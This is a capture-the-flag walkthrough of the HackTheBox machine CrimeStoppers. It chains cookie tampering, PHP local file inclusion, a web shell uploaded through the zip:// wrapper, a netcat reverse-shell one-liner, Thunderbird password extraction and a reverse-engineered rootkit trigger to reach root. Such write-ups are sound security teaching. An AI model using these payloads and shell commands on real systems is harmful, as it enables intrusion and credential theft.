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File metadata and controls

281 lines (212 loc) · 10.8 KB


This is the write-up for the box CrimeStoppers that got retired at the 2nd June 2018. My IP address was while I did this.

Let's put this in our hosts file:    crimestoppers.htb


Starting with a Nmap scan:

nmap -sC -sV -o nmap/crimestoppers.nmap
80/tcp open  http    Apache httpd 2.4.25 ((Ubuntu))
|_http-server-header: Apache/2.4.25 (Ubuntu)
|_http-title: FBIs Most Wanted: FSociety

Checking HTTP (Port 80)

On the web page there are pictures and descriptions of fsociety from the Mr. Robot series. In the menu there is a page called Upload that redirects to /?op=upload where we can send any text to the web server,

Upload page

After sending this, it forwards to /?op=view&secretname=613c59d9877e27846bf36b956b3583ae57de3dfb. Lets send this to Burpsuite to analyze the request.

POST /?op=upload HTTP/1.1
Cookie: admin=0; PHPSESSID=f0nj42hba7vvlcqit2mbflv792
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="tip"

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="token"

Content-Disposition: form-data; name="submit"

Send Tip!

The op variable seems to have different parameters like view ,upload and home. Also the cookie admin=0 is interesting, so lets change the value to 1 and see what happens:

List page

It shows a new menu in which it shows all the uploaded files. The hashes are tests from me, but Whiterose.txt looks interesting and has the following content:

Hello, <br /> You guys should really learn to code, one of the GET Parameters is still vulnerable. Most will think it just leads to a Source Code disclosure but there is a chain that provides RCE. <br /> Contact WhiteRose@DarkArmy.htb for more info.

The only GET parameters found so far are op and secretname and the first one is probably vulnerable. After analyzing the page, it becomes clear that the values for op are just PHP files on the server. When accessing them like /view.php, they just display a white page and not an error, so they exist and the variables execute them from another directory.

In this case, lets try a Local File Inclusion trick with PHP to get the source code of the scripts as a Base64-decoded string:

Now copying the Base64-encoded string into a file and decoding it, to read the PHP code of home.php:

base64 -d home.php.b64 > home.php

This can be done for all the PHP scripts that were found so far: home.php, index.php, list.php, view.php, upload.php, common.php.

In common.php there is another hint as a comment:

/* Stop hackers. \*/
if(!defined('FROM_INDEX')) die();

// If the hacker cannot control the filename, it's totally safe to let them write files... Or is it?
function genFilename() {
        return sha1($\_SERVER['REMOTE_ADDR'] . $\_SERVER['HTTP_USER_AGENT'] . time() . mt_rand());

In upload.php it says that files get uploaded to http[:]// and when browsing there to my IP address, I can see the tips I uploaded as files:

Uploaded tips as files

This means that uploaded tips become files on the web server which means that uploading a malicious file could get command execution.

Getting command execution

As those files don't get the .php extension, a PHP wrapper has to be used so the script gets executed. I will use the ZIP compression wrapper for PHP.

Creating a malicious cmd.php PHP script:

<?php echo system($\_REQUEST['test']); ?>

Compressing it with zip:

zip cmd.php

The has to be uploaded correctly on the box. To do that converting it to a Base64 string is helpful:

base64 -w 0

# Output

Sending string as a request after decoding it with Burpsuite:

Request in Burpsuite

Sending the request and the file will be accessible on the box but with the hash name. Now we can use the ZIP PHP wrapper to access the file and execute commands:

This outputs the username www-data. Lets start a reverse shell on the box:

GET /?op=zip://uploads/ /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f

# URL-encoded
GET /?op=zip://uploads/|/bin/sh+-i+2>%261|nc+>/tmp/f

Now it started a reverse shell session as www-data.

Privilege Escalation

There is one home directory from user dom that can be accessed by us. In her home directory is a hidden .thunderbird directory which could be useful to escalate privileges to her. Compressing the Thunderbird profile with tar and put it into /var/www/html/uploads/ to download it to our local client:

tar -cjvf /var/www/html/uploads/ 36jinndk.default/

Decompressing it locally:

tar -jxvf firefox.tar.bz2

Moving the folder into the default Thunderbird default folder for profiles:

mv 36jinndk.default/ ~/.thunderbird/

The profiles can be accessed by adding it in the profiles.ini and starting Thunderbird with the -ProfileManager parameter.

In the mailbox there is one received mail from WhiteRose[@]DarkArmy.htb with a ransom note:


I left note on "Leave a tip" page but no response.  Major vulnerability exists in your site!  This gives code execution. Continue to investigate us, we will sell exploit!  Perhaps buyer will not be so kind.

For more details place 1 million ecoins in your wallet.  Payment instructions will be sent once we see you move money.

After this, dom contacted elliot to investigate the issue:


We got a suspicious email from the DarkArmy claiming there is a Remote Code Execution bug on our Webserver.  I don't trust them and ran rkhunter, it reported that there a rootkit installed called: apache_modrootme backdoor.

According to my research, if this rootkit was on the server I should be able to run "nc localhost 80" and then type "get root" to get a root shell.   However, the server just errors out without providing any shell at all.  Would you mind checking if this is a false positive?

This information could be useful later. In the meantime we can extract the password of dom by using Firefox-Decrypt which also works on Thunderbird profiles:

python /root/.thunderbird/

When it asks for a password just pressing enter works as the profile is not password protected. It outputs a password for dom:

Website:   imap://crimestoppers.htb
Username: 'dom@crimestoppers.htb'
Password: 'Gummer59'

Changing users can be either done with su - from www-data to dom or by using SSH on the IPv6 address to login via SSH as there are firewall rules on IPv4:

ssh dom@dead:beef::250:56ff:feb9:f170

Privilege Escalation to root

Now that we are dom lets investigate the mail she sent to elliot. When searching for apache_modrootme backdoor there is a GitHub repo called mod-rootme that works just like dom explained in her mail.

The file in /usr/lib/apache/modules/ exists, so this is what has to be analyzed. Lets download it to our local client:

scp -6 dom@[dead:beef::250:56ff:feb9:f170]:/usr/lib/apache2/modules/ .

Any debugger can be used for this 64-bit ELF binary and I will use Radare2:

r2 mod_rootme

Analyzing all functions with aaa and print them with afl and see there is an odd one called sym.darkarmy:


0x00000f70    4 50   -> 44   entry0
0x00001070   16 586  -> 563  sym.process_client
0x000016e0   46 919  -> 902  sym.shell_spooler
0x00001330   27 934  -> 904  sym.runshell_pty
0x00001ac0    3 61           sym.darkarmy
0x00000e40    3 23           sym.\_init
0x00001b78    1 9            sym.\_fini
0x000012c0    1 100          sym.runshell_raw
0x00000fb0    4 66   -> 57   sym.register_tm_clones
0x00001000    5 50           entry.fini0
0x00001040    4 48   -> 42   entry.init0
0x00001a80    1 44           sym.rootme_register_hooks
0x00001ab0    1 16           sym.rootme_post_config
0x00001b00    6 118  -> 116  sym.rootme_post_read_request

Printing disassembly of the function:

pdf @sym.darkarmy

Functions in Radare2

The function loads two effective addresses with a bytearray at 0x00001bf2 and the other one is a string called "HackTheBox" into the registers rdi and rsi. After clearing edx it goes into a loop where the first character of rdi gets put into ecx and XOR'ed against the first character of rsi. It adds 1 byte to rdx and checks if the length of the string is equal to 0xa (which is 10 as HackTheBox has 10 characters) and jump back up and do it all over again to compare the second byte of rdi and so on.

So what has to be done, is to grab the string at 0x00001bf2 and the string "HackTheBox" and XOR them. First lets take the hex data out of the memory address:

px @0x00001bf2

0x00001bf2: 0e14 0d38 3b0b 0c27 1b01

These are the first 10 bytes of that address and now lets XOR that to the string with Python:

b1 = bytearray("\x0e\x14\x0d\x38\x3b\x0b\x0c\x27\x1b\x01")
b2 = bytearray("HackTheBox")

for i in range(0,10):
   print(chr(b1[i] ^ b2[i]))

This outputs "FunSociety" which can be used as a GET parameter to use the apache_modrootme rootkit:

nc 80
GET FunSociety

# Output
rootme-0.5 DarkArmy Edition Ready
uid=0(root) gid=0(root) groups=0(root)

It started a shell on the box as root!